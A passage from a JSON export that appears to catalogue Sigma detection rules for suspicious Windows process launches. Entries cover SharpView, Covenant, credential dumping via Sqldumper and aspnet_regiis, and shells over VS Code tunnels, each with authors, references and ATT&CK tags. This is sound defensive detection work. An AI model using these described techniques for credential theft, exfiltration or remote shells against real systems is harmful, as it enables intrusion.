"attack.t1135", "attack.t1033" ] }, "related": [ { "dest-uuid": "7e150503-88e7-4861-866b-ff1ac82c4475", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "2aed01ad-3df3-4410-a8cb-11ea4ded587c", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "767dbf9e-df3f-45cb-8998-4903ab5f80c0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "3489cfc5-640f-4bb3-a103-9137b97de79f", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b2317cfa-4a47-4ead-b3ff-297438c0bc2d", "value": "HackTool - SharpView Execution" }, { "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", "meta": { "author": "frack113", "creation_date": "2021-07-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_automated_collection.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1552.001/T1552.001.md", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_automated_collection.yml" ], "tags": [ "attack.collection", "attack.t1119", "attack.credential-access", "attack.t1552.001" ] }, "related": [ { "dest-uuid": "30208d3e-0d6b-43c8-883e-44462a514619", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "837f9164-50af-4ac0-8219-379d8a74cefc", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f576a613-2392-4067-9d1a-9345fb58d8d1", "value": "Automated Collection Command Prompt" }, { "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", "meta": { "author": "Tim Rauch, Elastic (idea)", "creation_date": "2022-09-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_iis_connection_strings_decryption.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/guide/en/security/current/microsoft-iis-connection-strings-decryption.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_connection_strings_decryption.yml" ], "tags": [ "attack.credential-access", "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "97dbf6e2-e436-44d8-abee-4261b24d3e41", "value": "Microsoft IIS Connection Strings Decryption" }, { "description": "Detects the execution of \"whoami.exe\" by privileged accounts that are often abused by threat actors", "meta": { "author": "Florian Roth (Nextron Systems), Teymur Kheirkhabarov", "creation_date": "2022-01-28", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_whoami_execution_from_high_priv_process.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://speakerdeck.com/heirhabarov/hunting-for-privilege-escalation-in-windows-environment", "https://web.archive.org/web/20221019044836/https://nsudo.m2team.org/en-us/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_whoami_execution_from_high_priv_process.yml" ], "tags": [ "attack.privilege-escalation", "attack.discovery", "attack.t1033" ] }, "related": [ { "dest-uuid": "03d7999c-1f4c-42cc-8373-e7690d318104", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79ce34ca-af29-4d0e-b832-fc1b377020db", "value": "Whoami.EXE Execution From Privileged Process" }, { "description": "Detects \"svchost.exe\" spawning \"rundll32.exe\" with command arguments like \"C:\\windows\\system32\\davclnt.dll,DavSetCookie\".\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on a WebDav server).\n", "meta": { "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "creation_date": "2020-05-02", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_rundll32_webdav_client_execution.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/OTRF/detection-hackathon-apt29/issues/17", "https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_webdav_client_execution.yml" ], "tags": [ "attack.exfiltration", "attack.t1048.003" ] }, "related": [ { "dest-uuid": "fb8d023d-45be-47e9-bc51-f56bcae6435b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", "value": "WebDav Client Execution Via Rundll32.EXE" }, { "description": "Detects potential path traversal attempt via cmd.exe. Could indicate possible command/argument confusion/hijacking", "meta": { "author": "xknow @xknow_infosec, Tim Shelton", "creation_date": "2020-06-11", "falsepositive": [ "Java tools are known to produce false-positive when loading libraries" ], "filename": "proc_creation_win_cmd_path_traversal.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://hackingiscool.pl/cmdhijack-command-argument-confusion-with-path-traversal-in-cmd-exe/", "https://twitter.com/Oddvarmoe/status/1270633613449723905", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_path_traversal.yml" ], "tags": [ "attack.execution", "attack.t1059.003" ] }, "related": [ { "dest-uuid": "d1fcf083-a721-4223-aedf-bf8960798d62", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "087790e3-3287-436c-bccf-cbd0184a7db1", "value": "Potential CommandLine Path Traversal Via Cmd.EXE" }, { "description": "Detects the execution of a shell (powershell, bash, wsl...) via Visual Studio Code tunnel. Attackers can abuse this functionality to establish a C2 channel and execute arbitrary commands on the system.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-10-25", "falsepositive": [ "Legitimate use of Visual Studio Code tunnel and running code from there" ], "filename": "proc_creation_win_vscode_tunnel_remote_shell_.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://code.visualstudio.com/docs/remote/tunnels", "https://badoption.eu/blog/2023/01/31/code_c2.html", "https://ipfyx.fr/post/visual-studio-code-tunnel/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_vscode_tunnel_remote_shell_.yml" ], "tags": [ "attack.command-and-control", "attack.t1071.001" ] }, "related": [ { "dest-uuid": "df8b2a25-8bdf-4856-953c-a04372b1c161", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f4a623c2-4ef5-4c33-b811-0642f702c9f1", "value": "Visual Studio Code Tunnel Shell Execution" }, { "description": "Detects Schtask creations that point to a suspicious folder or an environment variable often used by malware", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-02-21", "falsepositive": [ "Benign scheduled tasks creations or executions that happen often during software installations", "Software that uses the AppData folder and scheduled tasks to update the software in the AppData folders" ], "filename": "proc_creation_win_schtasks_env_folder.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.joesandbox.com/analysis/514608/0/html#324415FF7D8324231381BAD48A052F85DF04", "https://blog.talosintelligence.com/gophish-powerrat-dcrat/", "https://www.welivesecurity.com/2022/01/18/donot-go-do-not-respawn/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_schtasks_env_folder.yml" ], "tags": [ "attack.execution", "attack.t1053.005" ] }, "related": [ { "dest-uuid": "005a06c6-14bf-4118-afa0-ebcd8aebb0c9", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "81325ce1-be01-4250-944f-b4789644556f", "value": "Schedule Task Creation From Env Variable Or Potentially Suspicious Path Via Schtasks.EXE" }, { "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity.\nScreensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable (PE) files with a .scr file extension\n", "meta": { "author": "frack113", "creation_date": "2021-08-19", "falsepositive": [ "GPO" ], "filename": "proc_creation_win_reg_screensaver.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1546.002/T1546.002.md", "https://www.welivesecurity.com/wp-content/uploads/2017/08/eset-gazer.pdf", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_screensaver.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1546.002" ] }, "related": [ { "dest-uuid": "ce4b7013-640e-48a9-b501-d0025a95f4bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "0fc35fc3-efe6-4898-8a37-0b233339524f", "value": "Suspicious ScreenSave Change by Reg.exe" }, { "description": "Detects suspicious Plink tunnel port forwarding to a local port", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-01-19", "falsepositive": [ "Administrative activity using a remote port forwarding to a local port" ], "filename": "proc_creation_win_plink_port_forwarding.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.real-sec.com/2019/04/bypassing-network-restrictions-through-rdp-tunneling/", "https://medium.com/@informationsecurity/remote-ssh-tunneling-with-plink-exe-7831072b3d7d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_plink_port_forwarding.yml" ], "tags": [ "attack.command-and-control", "attack.t1572", "attack.lateral-movement", "attack.t1021.001" ] }, "related": [ { "dest-uuid": "4fe28b27-b13c-453e-a386-c2ef362a573b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "eb062747-2193-45de-8fa2-e62549c37ddf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "48a61b29-389f-4032-b317-b30de6b95314", "value": "Suspicious Plink Port Forwarding" }, { "description": "Use of hostname to get information", "meta": { "author": "frack113", "creation_date": "2022-01-01", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hostname_execution.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1082/T1082.md#atomic-test-6---hostname-discovery-windows", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/hostname", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hostname_execution.yml" ], "tags": [ "attack.discovery", "attack.t1082" ] }, "related": [ { "dest-uuid": "354a7f88-63fb-41b5-a801-ce3b377b36f1", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "7be5fb68-f9ef-476d-8b51-0256ebece19e", "value": "Suspicious Execution of Hostname" }, { "description": "Detects suspicious reconnaissance command line activity on Windows systems using Net.EXE\nCheck if the user that executed the commands is suspicious (e.g. service accounts, LOCAL_SYSTEM)\n", "meta": { "author": "Florian Roth (Nextron Systems), omkar72, @svch0st, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2019-01-16", "falsepositive": [ "Inventory tool runs", "Administrative activity" ], "filename": "proc_creation_win_net_groups_and_accounts_recon.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/", "https://redcanary.com/blog/how-one-hospital-thwarted-a-ryuk-ransomware-outbreak/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml" ], "tags": [ "attack.discovery", "attack.t1087.001", "attack.t1087.002" ] }, "related": [ { "dest-uuid": "25659dd6-ea12-45c4-97e6-381e3e4b593e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "21875073-b0ee-49e3-9077-1e2a885359af", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "d95de845-b83c-4a9a-8a6a-4fc802ebf6c0", "value": "Suspicious Group And Account Reconnaissance Activity Using Net.EXE" }, { "description": "Detects suspicious process run from unusual locations", "meta": { "author": "juju4, Jonhnathan Ribeiro, oscd.community", "creation_date": "2019-01-16", "falsepositive": [ "False positives depend on scripts and administrative tools used in the monitored environment" ], "filename": "proc_creation_win_rundll32_run_locations.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://car.mitre.org/wiki/CAR-2013-05-002", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_run_locations.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036", "car.2013-05-002" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "15b75071-74cc-47e0-b4c6-b43744a62a2b", "value": "Suspicious Process Start Locations" }, { "description": "Adversaries may abuse msiexec.exe to proxy execution of malicious payloads.\nMsiexec.exe is the command-line utility for the Windows Installer and is thus commonly associated with executing installation packages (.msi)\n", "meta": { "author": "frack113", "creation_date": "2022-01-16", "falsepositive": [ "WindowsApps installing updates via the quiet flag" ], "filename": "proc_creation_win_msiexec_install_quiet.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/_st0pp3r_/status/1583914244344799235", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_install_quiet.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218.007" ] }, "related": [ { "dest-uuid": "365be77f-fc0e-42ee-bac8-4faf806d9336", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "79a87aa6-e4bd-42fc-a5bb-5e6fbdcd62f5", "value": "Msiexec Quiet Installation" }, { "description": "Detects the usage of emojis in the command line, this could be a sign of potential defense evasion activity.", "meta": { "author": "@Kostastsale, @TheDFIRReport", "creation_date": "2022-12-05", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_susp_emoji_usage_in_cli_4.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_emoji_usage_in_cli_4.yml" ], "tags": [ "attack.defense-evasion" ] }, "uuid": "225274c4-8dd1-40db-9e09-71dff4f6fb3c", "value": "Potential Defense Evasion Activity Via Emoji Usage In CommandLine - 4" }, { "description": "Detects potential abuse of the provisioning registry key for indirect command execution through \"Provlaunch.exe\".", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems), Swachchhanda Shrawan Poudel", "creation_date": "2023-08-08", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_registry_provlaunch_provisioning_command.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1674399582162153472", "https://lolbas-project.github.io/lolbas/Binaries/Provlaunch/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_registry_provlaunch_provisioning_command.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "2a4b3e61-9d22-4e4a-b60f-6e8f0cde6f25", "value": "Potential Provisioning Registry Key Abuse For Binary Proxy Execution" }, { "description": "Detects execution of Chromium based browser in headless mode", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-09-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_browsers_chromium_headless_exec.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/mrd0x/status/1478234484881436672?s=12", "https://www.trendmicro.com/en_us/research/23/e/managed-xdr-investigation-of-ducktail-in-trend-micro-vision-one.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_browsers_chromium_headless_exec.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ef9dcfed-690c-4c5d-a9d1-482cd422225c", "value": "Browser Execution In Headless Mode" }, { "description": "Detects a CodePage modification using the \"mode.com\" utility to Russian language.\nThis behavior has been used by threat actors behind Dharma ransomware.\n", "meta": { "author": "Joseliyo Sanchez, @Joseliyo_Jstnk", "creation_date": "2024-01-17", "falsepositive": [ "Russian speaking people changing the CodePage" ], "filename": "proc_creation_win_mode_codepage_russian.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/mode", "https://learn.microsoft.com/en-us/windows/win32/intl/code-page-identifiers", "https://www.virustotal.com/gui/file/5e75ef02517afd6e8ba6462b19217dc4a5a574abb33d10eb0f2bab49d8d48c22/behavior", "https://strontic.github.io/xcyclopedia/library/mode.com-59D1ED51ACB8C3D50F1306FD75F20E99.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mode_codepage_russian.yml" ], "tags": [ "attack.defense-evasion", "attack.t1036" ] }, "related": [ { "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "12fbff88-16b5-4b42-9754-cd001a789fb3", "value": "CodePage Modification Via MODE.COM To Russian Language" }, { "description": "Detects process dump via legitimate sqldumper.exe binary", "meta": { "author": "Kirill Kiryanov, oscd.community", "creation_date": "2020-10-08", "falsepositive": [ "Legitimate MSSQL Server actions" ], "filename": "proc_creation_win_lolbin_susp_sqldumper_activity.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Sqldumper/", "https://twitter.com/countuponsec/status/910969424215232518", "https://twitter.com/countuponsec/status/910977826853068800", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml" ], "tags": [ "attack.credential-access", "attack.t1003.001" ] }, "related": [ { "dest-uuid": "65f2d882-3f41-4d48-8a06-29af77ec9f90", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "23ceaf5c-b6f1-4a32-8559-f2ff734be516", "value": "Dumping Process via Sqldumper.exe" }, { "description": "Detects the execution of AdvancedRun utility in the context of the TrustedInstaller, SYSTEM, Local Service or Network Service accounts", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-01-20", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_pua_advancedrun_priv_user.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://www.elastic.co/security-labs/operation-bleeding-bear", "https://www.winhelponline.com/blog/run-program-as-system-localsystem-account-windows/", "https://twitter.com/splinter_code/status/1483815103279603714", "https://medium.com/s2wblog/analysis-of-destructive-malware-whispergate-targeting-ukraine-9d5d158f19f3", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml" ], "tags": [ "attack.defense-evasion", "attack.privilege-escalation", "attack.t1134.002" ] }, "related": [ { "dest-uuid": "677569f9-a8b0-459e-ab24-7f18091fa7bf", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fa00b701-44c6-4679-994d-5a18afa8a707", "value": "PUA - AdvancedRun Suspicious Execution" }, { "description": "Detects direct modification of autostart extensibility point (ASEP) in registry using reg.exe.", "meta": { "author": "Victor Sergeev, Daniil Yugoslavskiy, oscd.community", "creation_date": "2019-10-25", "falsepositive": [ "Legitimate software automatically (mostly, during installation) sets up autorun keys for legitimate reasons.", "Legitimate administrator sets up autorun keys for legitimate reasons.", "Discord" ], "filename": "proc_creation_win_reg_direct_asep_registry_keys_modification.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1547.001/T1547.001.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_direct_asep_registry_keys_modification.yml" ], "tags": [ "attack.persistence", "attack.t1547.001" ] }, "related": [ { "dest-uuid": "9efb1ea7-c37b-4595-9640-b7680cd84279", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "24357373-078f-44ed-9ac4-6d334a668a11", "value": "Direct Autorun Keys Modification" }, { "description": "Detects the enumeration of a specific DLL or EXE being used by a binary via \"tasklist.exe\".\nThis is often used by attackers in order to find the specific process identifier (PID) that is using the DLL in question.\nIn order to dump the process memory or perform other nefarious actions.\n", "meta": { "author": "Swachchhanda Shrawan Poudel", "creation_date": "2024-02-12", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_tasklist_module_enumeration.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://pentestlab.blog/tag/svchost/", "https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_tasklist_module_enumeration.yml" ], "tags": [ "attack.t1003" ] }, "related": [ { "dest-uuid": "0a3ead4e-6d47-4ccb-854c-a6a4f9d96b22", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "34275eb8-fa19-436b-b959-3d9ecd53fa1f", "value": "Loaded Module Enumeration Via Tasklist.EXE" }, { "description": "Detects execution of the Notepad++ updater (gup) from a process other than Notepad++ to download files.", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-06-10", "falsepositive": [ "Other parent processes other than notepad++ using GUP that are not currently identified" ], "filename": "proc_creation_win_gup_download.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://twitter.com/nas_bench/status/1535322182863179776", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_gup_download.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "44143844-0631-49ab-97a0-96387d6b2d7c", "value": "File Download Using Notepad++ GUP Utility" }, { "description": "Detects suspicious command lines used in Covenant luanchers", "meta": { "author": "Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community", "creation_date": "2020-06-04", "falsepositive": "No established falsepositives", "filename": "proc_creation_win_hktl_covenant.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://posts.specterops.io/covenant-v0-5-eee0507b85ba", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_covenant.yml" ], "tags": [ "attack.execution", "attack.defense-evasion", "attack.t1059.001", "attack.t1564.003" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "cbb66055-0325-4111-aca0-40547b6ad5b0", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c260b6db-48ba-4b4a-a76f-2f67644e99d2", "value": "HackTool - Covenant PowerShell Launcher" }, { "description": "Detect usage of the \"runexehelper.exe\" binary as a proxy to launch other programs", "meta": { "author": "frack113", "creation_date": "2022-12-29", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_runexehelper.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Runexehelper/", "https://twitter.com/0gtweet/status/1206692239839289344", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_runexehelper.yml" ], "tags": [ "attack.defense-evasion", "attack.t1218" ] }, "related": [ { "dest-uuid": "457c7820-d331-465a-915e-42f85500ccc4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cd71385d-fd9b-4691-9b98-2b1f7e508714", "value": "Lolbin Runexehelper Use As Proxy" }, { "description": "Detects command lines that indicate unwanted modifications to registry keys that disable important Internet Explorer security features", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2020-06-19", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_disable_ie_features.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://unit42.paloaltonetworks.com/operation-ke3chang-resurfaces-with-new-tidepool-malware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_disable_ie_features.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.001" ] }, "related": [ { "dest-uuid": "ac08589e-ee59-4935-8667-d845e38fe579", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "fb50eb7a-5ab1-43ae-bcc9-091818cb8424", "value": "Disabled IE Security Features" }, { "description": "Download or Copy file with Extrac32", "meta": { "author": "frack113", "creation_date": "2021-11-26", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_lolbin_extrac32.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" ], "tags": [ "attack.command-and-control", "attack.t1105" ] }, "related": [ { "dest-uuid": "e6919abc-99f9-4c6c-95a5-14761e7b2add", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", "value": "Suspicious Extrac32 Execution" }, { "description": "Detects powershell scripts that import modules from suspicious directories", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-10", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_powershell_import_module_susp_dirs.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml" ], "tags": [ "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "c31364f7-8be6-4b77-8483-dd2b5a7b69a3", "value": "Import PowerShell Modules From Suspicious Directories - ProcCreation" }, { "description": "Detects execution of the SharpImpersonation tool. Which can be used to manipulate tokens on a Windows computers remotely (PsExec/WmiExec) or interactively", "meta": { "author": "Sai Prashanth Pulisetti @pulisettis, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-12-27", "falsepositive": [ "Unknown" ], "filename": "proc_creation_win_hktl_sharp_impersonation.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ "https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/", "https://github.com/S3cur3Th1sSh1t/SharpImpersonation", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hktl_sharp_impersonation.yml" ], "tags": [ "attack.privilege-escalation", "attack.defense-evasion", "attack.t1134.001", "attack.t1134.003" ] }, "related": [ { "dest-uuid": "86850eff-2729-40c3-b85e-c4af26da4a2d", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "8cdeb020-e31e-4f88-a582-f53dcfbda819", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f89b08d0-77ad-4728-817b-9b16c5a69c7a", "value": "HackTool - SharpImpersonation Execution" }, { "description": "Detects active directory enumeration activity using known AdFind CLI flags", "meta": { "author": "frack113", "creation_date": "2021-12-13", "falsepositive": [ "Authorized administrative activity" ], "filename": "proc_creation_win_pua_adfind_enumeration.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": 